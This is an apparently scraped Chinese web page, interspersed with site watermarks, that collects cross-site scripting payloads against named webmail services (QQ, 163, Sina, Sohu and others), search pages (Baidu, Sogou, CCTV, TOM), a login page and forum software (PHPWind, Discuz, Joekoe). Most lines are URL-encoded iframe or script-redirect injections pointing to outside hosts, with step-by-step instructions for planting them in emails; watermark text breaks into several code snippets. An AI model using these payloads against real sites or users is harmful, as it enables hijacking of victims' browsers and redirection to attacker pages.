QQ邮件:
本问来自中国创业信息理财网 www.info-zg.com
以下是代码片段:<img src=javascript:document.write('<Iframe%20src=http://hi.baidu.com/jc123%20width=500%20height=550%3E</iframe%3E')>
163邮件:
以下是代码片段:<img src=j avascript:document.write('%3CIframe%20src=http://hi.baidu.com/jc123%20width=500%20height=550%3E%3C/iframe%3E')>
<Iframe%20src=http://hi.baidu.com/jc123%20width=500%20height=550%3E</iframe%3E')> www.info-zg.com
126邮件也适用与Q邮箱:
www.info-zg.com
以下是代码片段:<img src=javascript:document.write('
其他邮箱请参考hackest&雕牌 [H.S.T]的“对国内主流邮箱的跨站测试”一文
另外是一些跨站漏洞(作者在另一主题中提交被管理人员合并进来) www.info-zg.com 欢迎您
Sogou: www.info-zg.com
请勿盗链信息 http://www.info-zg.com
OpenV:
新华网视频搜索也是OpenV的
CCTV:(好像有人发过了)
天极网: www.info-zg.com 欢迎您
| 以下是代码片段:http://search.yesky.com/search.do?stype=0&wd=%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%68%61%63%6B%31%30%30%2E%63%6E%22%20%77%69%64%74%68%3D%22%39%30%30%22%20%68%65%69%67%68%74%3D%22%31%35%30%30%22%3E%3C%2F%69%66%72%61%6D%65%3E |
www.info-zg.com 欢迎您
智联招聘: 请勿盗链本站信息,www.info-zg.com
| 以下是代码片段:http://student.zhaopin.com/Job/CompanyList.asp?C=%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%68%61%63%6B%31%30%30%2E%63%6E%22%20%77%69%64%74%68%3D%22%39%30%30%22%20%68%65%69%67%68%74%3D%22%31%35%30%30%22%3E%3C%2F%69%66%72%61%6D%65%3E |
很久以前[B.s.T]团队就对这个发生了渗透以及讨论..
如题:http://hi.baidu.com/b_s_t/blog/item/2404052e8d0486514ec22676.html
http://www.info-zg.com字串3
| 以下是代码片段:<img src=javascript:document.write('<Iframe%20src=http://hi.baidu.com/jc123%20width=500%20height=550%3E</iframe%3E')> |
| 以下是代码片段:<img src=javascript:document.write('
<Iframe%20src=http://hi.baidu.com/jc123%20width=500%20height=550%3E</iframe%3E')>
中国创业理财信息网 www.info-zg.com |
以下是会员“搁浅”补充的内容。
21cn邮箱:
利用方法:风格设为为"左右"—"写信"—"插入图片",在弹出的框里输入跨站代码即可。
新浪邮箱:
利用方法:"写信"—"插入图片",在弹出的框里输入跨站代码即可。
TOM邮箱:
利用方法:"写信"—"编辑HTML信件",再勾选上"编辑源码",输入跨站代码即可。
Sohu邮箱:
利用方法:直接发送即可,但要回复才能看见效果。
同时还适合于更多邮箱
BBS的直接跨站漏洞(swf跳转)
PHPWind论坛的跨站代码:
| 以下是代码片段: www.info-zg.com 欢迎您 [wmv]http://www.aground.cn/gq.swf?url=输入你要跨的地址[/wmv] |
(注意:因过滤问题,请删除第一个[ wmv]的空格)
Discuz论坛的跨站代码:
| 以下是代码片段:[flash]http://www.aground.cn/gq.swf?url=输入你要跨的地址[/flash] |
Joekoe论坛的跨站代码:
| 以下是代码片段:[QT=450,350]http://www.aground.cn/gq.swf?url=输入你要跨的地址[/QT] 请勿盗链本站信息,www.info-zg.com |
同时适合于更多论坛,只要灵活运用就可以了。
http://www.info-zg.com
| 以下是代码片段:http://vsearch.cctv.com/tvsearch.jsp?q=%3C%2F%74%69%74%6C%65%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%69%2E%62%61%69%64%75%2E%63%6F%6D%2F%6A%63%31%32%33%3E |
www.info-zg.com 欢迎您
| 以下是代码片段:http://search.tom.com/ci.php?word=%3C%2F%74%69%74%6C%65%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%68%61%63%6B%31%30%30%2E%63%6E%3E |
百度:
| 以下是代码片段:http://cache.baidu.com/c?url=%68%74%74%70%3A%2F%2F%68%69%2E%62%61%69%64%75%2E%63%6F%6D%2F%6A%63%31%32%33&p=2007c64ad6c02dec05bd9b7e000000 http://www.baidu.com/s?wd=><script>window.location=('http://hi.baidu.com/jc123')</script> |
http://www.info-zg.com字串3
163:(好像也有人发过了) 请勿盗链信息 http://www.info-zg.com
| 以下是代码片段:https://reg.163.com/logins.jsp?username=%22%22%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%69%2E%62%61%69%64%75%2E%63%6F%6D%2F%6A%63%31%32%33%3E%3C%2F%69%66%72%61%6D%65%3E%22%3C%22&password=123456 |


文章评论
共有 0位创业者发表了评论 查看完整内容